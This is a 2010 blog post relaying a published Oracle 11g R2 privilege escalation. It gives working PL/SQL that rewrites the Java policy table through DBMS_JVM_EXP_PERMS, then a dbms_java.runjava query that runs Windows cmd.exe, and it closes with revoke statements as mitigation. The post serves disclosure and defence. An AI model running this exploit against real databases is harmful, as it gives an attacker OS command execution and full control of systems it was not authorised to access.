Oraclue

Oracle internals, debugging and undocumented features

Oracle Exploit Published 11g R2

Just found this alert..

Credit goes to David Litchfield .He found these vulnerabilities .This also affects 11g R2.

Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.

Basically  using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS user can change their privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.

Here is  code:

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

Oracle does not have patch for it yet but you should revoke privileges from PUBLIC for following packages:

revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from  public;

Advertisements

5 responses to “Oracle Exploit Published 11g R2

  1. Michael O'Neill February 5, 2010 at 10:21 pm

    Java Bad (waves arms slowly and awkwardly at imaginary flames).

  2. Pingback: uberVU - social comments

  3. Pingback: Most Tweeted Articles by Oracle Experts: MrTweet

  4. Pingback: Log Buffer #178: a Carnival of the Vanities for DBAs | The Pythian Blog

  5. Pingback: Blogroll Report 29/01/2009 – 05/02/2010 « Coskan’s Approach to Oracle

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: